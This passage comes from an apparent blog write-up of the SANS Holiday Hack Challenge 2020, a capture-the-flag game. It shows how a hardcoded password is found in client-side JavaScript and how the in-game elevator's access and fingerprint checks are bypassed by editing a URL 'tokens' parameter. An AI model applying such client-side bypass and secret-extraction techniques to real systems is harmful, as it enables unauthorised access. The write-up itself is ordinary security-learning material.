  &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;theirPassword&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getElementById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;password&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="hll"&gt;  &lt;span class="nb"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ipcRenderer&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;invoke&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;unlock&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;theirPassword&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;then&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;closeOverlay&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getElementById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;password-message&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;innerText&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Invalid password!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="nx"&gt;setTimeout&lt;/span&gt;&lt;span class="p"&gt;(()&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getElementById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;password-message&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;innerText&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="mi"&gt;2000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;By digging around the file, we can find the &lt;code&gt;unlock&lt;/code&gt; function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nx"&gt;ipcMain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;handle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;unlock&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;password&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;password&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="nx"&gt;SANTA_PASSWORD&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The password is compared to a variable called &lt;code&gt;SANTA_PASSWORD&lt;/code&gt;. We can
find its value in the same file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;SANTA_PASSWORD&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;santapass&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, using the password &lt;code&gt;santapass&lt;/code&gt;, we can unlock the POS:&lt;/p&gt;
&lt;img alt="pos_unlocked.png" class="align-center" src="/images/sans-christmas-challenge-2020/pos_unlocked.png" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-4"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id9"&gt;Objective 4:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="pepper-minstix-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id10"&gt;Pepper Minstix's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Can you help me?&lt;/span&gt;

&lt;span class="go"&gt;I was playing with my birdie (she&amp;#39;s a Green Cheek!) in something called tmux,&lt;/span&gt;
&lt;span class="go"&gt;then I did something and it disappeared!&lt;/span&gt;

&lt;span class="go"&gt;Can you help me find her? We were so attached!!&lt;/span&gt;
&lt;span class="gp"&gt;elf@d6ba776b7158:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;From the message, we gather that we must attach to a &lt;code&gt;tmux&lt;/code&gt; session.
Let's see the different sessions available:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@58113bd45bb4:~$&lt;/span&gt; tmux list-sessions
&lt;span class="go"&gt;0: 1 windows (created Tue Dec 22 15:13:15 2020) [80x24]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Only one session, let's attach to it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@58113bd45bb4:~$&lt;/span&gt; tmux attach-session -t &lt;span class="m"&gt;0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="pepper_minstix_cranberry_pi_w00t.png" class="align-center" src="/images/sans-christmas-challenge-2020/pepper_minstix_cranberry_pi_w00t.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="operate-the-santavator"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id11"&gt;Operate the Santavator&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're supposed to talk to Pepper Minstix to get information about the
Santavator:&lt;/p&gt;
&lt;img alt="pepperminstix.png" class="align-center" src="/images/sans-christmas-challenge-2020/pepperminstix.png" /&gt;
&lt;p&gt;&lt;em&gt;Pepper Minstix says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;There's a Santavator that moves visitors from floor to floor, but it's a
bit wonky.&lt;/p&gt;
&lt;p&gt;You'll need a key and other odd objects. Try talking to Sparkle Redberry
about the key.&lt;/p&gt;
&lt;p&gt;For the odd objects, maybe just wander around the castle and see what you
find on the floor.&lt;/p&gt;
&lt;p&gt;Once you have a few, try using them to split, redirect, and color the Super
Santavator Sparkle Stream (S4).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, we can get the key directly from Sparkle Redberry:&lt;/p&gt;
&lt;img alt="sparkleredberry.png" class="align-center" src="/images/sans-christmas-challenge-2020/sparkleredberry.png" /&gt;
&lt;p&gt;&lt;em&gt;Sparkle Redberry says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey hey, Sparkle Redberry here!&lt;/p&gt;
&lt;p&gt;The Santavator is on the fritz. Something with the wiring is grinchy, but
maybe you can rig something up?&lt;/p&gt;
&lt;p&gt;Here's the key! Good luck!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;With the key, we can open the control pannel:&lt;/p&gt;
&lt;img alt="santavator_open.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_open.png" /&gt;
&lt;p&gt;Ok, we can see the sparkle stream that Pepper Minstix mentioned. He also said
that we can use objects to redirect the stream. Maybe to the three colored
nozzles? There's also some kind of access plan, that tells us which colored
nozzles we must use to get access to which floor:&lt;/p&gt;
&lt;img alt="santavator_access_plan.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_access_plan.png" /&gt;
&lt;p&gt;Here's the floor we can go to given the colors we activate:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;Green&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Lobby&lt;/li&gt;
&lt;li&gt;Talks&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;Green and red&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Workshop&lt;/li&gt;
&lt;li&gt;Roof access&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;Green, red, and yellow&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Santa's office&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, we need to find the bits and bobs to redirect the sparkle flow to the
nozzles. Or do we...&lt;/p&gt;
&lt;div class="section" id="first-method-finding-the-bits-and-bobs"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id12"&gt;First method: finding the bits and bobs&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The first way to properly operate the Santavator is to roam around Santa's
castle and find the bits and bobs.&lt;/p&gt;
&lt;p&gt;You can find the broken candycane next to the entry:&lt;/p&gt;
&lt;img alt="santavator_candycane.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_candycane.png" /&gt;
&lt;p&gt;The first hex nut is next to the Santavator:&lt;/p&gt;
&lt;img alt="santavator_hex_nut_1.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_hex_nut_1.png" /&gt;
&lt;p&gt;The second one is next to the arcade, below the table (I removed the table
so you could see):&lt;/p&gt;
&lt;img alt="santavator_hex_nut_2.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_hex_nut_2.png" /&gt;
&lt;p&gt;The green light is outside, next to the Google booth:&lt;/p&gt;
&lt;img alt="santavator_green_light.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_green_light.png" /&gt;
&lt;p&gt;With all these elements, we can light up the green nozzle, which means we can
go to the talk floor:&lt;/p&gt;
&lt;img alt="santavator_green_ok.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_green_ok.png" /&gt;
&lt;p&gt;The red light is next to track 7:&lt;/p&gt;
&lt;img alt="santavator_red_light.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_red_light.png" /&gt;
&lt;p&gt;With this new light, we can now go to the roof, in the NetWars room. We're
still missing the button to go to the workshop:&lt;/p&gt;
&lt;img alt="santavator_green_red_ok.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_green_red_ok.png" /&gt;
&lt;p&gt;The yellow light is next to Santa's sleigh, on the roof:&lt;/p&gt;
&lt;img alt="santavator_yellow_light.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_yellow_light.png" /&gt;
&lt;p&gt;And now we can light up every nozzle:&lt;/p&gt;
&lt;img alt="santavator_green_red_yellow_ok.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_green_red_yellow_ok.png" /&gt;
&lt;p&gt;This is all well and fine, but it takes time, and we're still missing some
key elements, namely the button that allows us to go to the workshop. There
also seems to be a fingerprint scan to go up to Santa's office.&lt;/p&gt;
&lt;p&gt;Do we &lt;em&gt;really&lt;/em&gt; need to find every bits and bobs?&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="second-method-pretending-we-have-the-bits-and-bobs"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id13"&gt;Second method: pretending we have the bits and bobs&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Let's take a look at the control pannel. We can right click on it and select
&amp;quot;Open this frame in a new tab&amp;quot;.&lt;/p&gt;
&lt;p&gt;We now see that the control pannel is loaded via the URL &lt;a class="reference external" href="https://elevator.kringlecastle.com/?challenge=elevator&amp;amp;id=guid&amp;amp;username=yourusername&amp;amp;area=santavator1&amp;amp;location=1,2&amp;amp;tokens=candycane,elevator-key"&gt;https://elevator.kringlecastle.com/?challenge=elevator&amp;amp;id=guid&amp;amp;username=yourusername&amp;amp;area=santavator1&amp;amp;location=1,2&amp;amp;tokens=candycane,elevator-key&lt;/a&gt;:&lt;/p&gt;
&lt;img alt="santavator_control_pannel_frame.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_control_pannel_frame.png" /&gt;
&lt;p&gt;We can see that the URL has a &lt;code&gt;tokens&lt;/code&gt; parameter, which seems to tell the
control pannel what bits and bobs we found. For example, if I add
&lt;code&gt;greenlight&lt;/code&gt; at the end of the URL, &lt;em&gt;presto&lt;/em&gt;, I now have a green light:&lt;/p&gt;
&lt;img alt="santavator_stolen_green_light.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_stolen_green_light.png" /&gt;
&lt;p&gt;Awesome! Now, how can we find the name of the missing bits and bobs? Well,
by looking at the source of the page, we can see that an &lt;code&gt;app.js&lt;/code&gt; file is
included. You can download said file &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/app.js"&gt;here&lt;/a&gt;.
By examining the file, we can find the name for the bits and bobs:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;The broken candycane is &lt;code&gt;candycane&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The first hex nut is &lt;code&gt;nut&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The second hex nut is &lt;code&gt;nut2&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The green, red, and yellow lights are &lt;code&gt;greenlight&lt;/code&gt;, &lt;code&gt;redlight&lt;/code&gt;,
and &lt;code&gt;yellowlight&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The missing workshop button is &lt;code&gt;workshop-button&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can also get some funky stuff, like:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Portals, with &lt;code&gt;portals&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Marbles, which act like planets with a gravity field, with &lt;code&gt;marble&lt;/code&gt;
and &lt;code&gt;marble2&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;A ball, with &lt;code&gt;ball&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There's even a &lt;code&gt;besanta&lt;/code&gt; parameter that you can set:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;handleBtn4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;cover&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;querySelector&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.print-cover&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="nx"&gt;cover&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;classList&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;open&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="nx"&gt;cover&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;addEventListener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;click&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;btn4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;classList&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;contains&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;powered&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;hasToken&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;besanta&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It must be the token that allows you to pass the fingerprint scan. Let's add
all of this in the &lt;code&gt;tokens&lt;/code&gt; parameter:&lt;/p&gt;
&lt;img alt="santavator_stolen_tokens.png" class="align-center" src="/images/sans-christmas-challenge-2020/santavator_stolen_tokens.png" /&gt;
&lt;p&gt;Bingo, we now have every bits and bobs! Now we can redirect the sparks to
every nozzle, and get access to every floor, even Santa's office:&lt;/p&gt;
&lt;img alt="santavator_santa_office.png" src="/images/sans-christmas-challenge-2020/santavator_santa_office.png" /&gt;
&lt;p&gt;Funny enough, that is objective 10, but I didn't know it before I bypassed
this security. Oh well ¯\_(ツ)_/¯&lt;/p&gt;
&lt;p&gt;But do we &lt;em&gt;really&lt;/em&gt; need to pretend to have every bits and bobs?&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="third-method-who-needs-bits-and-bobs-anyway"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id14"&gt;Third method: who needs bits and bobs, anyway&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Let's take a look at the &lt;code&gt;app.js&lt;/code&gt; code, to see how the control pannel
decides which floor are accessible:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;renderTraps&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;TRAPS&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;forEach&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;points&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;fillLevel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;pl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;Math&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;clamp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;PARTICLE_COUNTS&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nx"&gt;trapTargetCounts&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;steppa&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Math&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;floor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;fillLevel&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nx"&gt;wireSteps&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;]));&lt;/span&gt;
    &lt;span class="nx"&gt;wireElements&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;style&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;backgroundPosition&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sb"&gt;`0 &lt;/span&gt;&lt;span class="si"&gt;${&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;wireElements&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;clientHeight&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nx"&gt;steppa&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;px`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nx"&gt;ledElements&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;classList&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;fillLevel&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;add&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;remove&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;on&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;fillLevel&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;

  &lt;span class="nx"&gt;btn1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;classList&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;add&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;remove&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;powered&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="nx"&gt;btn3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;classList&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;add&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;remove&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;powered&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="nx"&gt;btn2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;classList&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;powered&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;hasToken&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;workshop-button&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;add&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;remove&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;powered&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
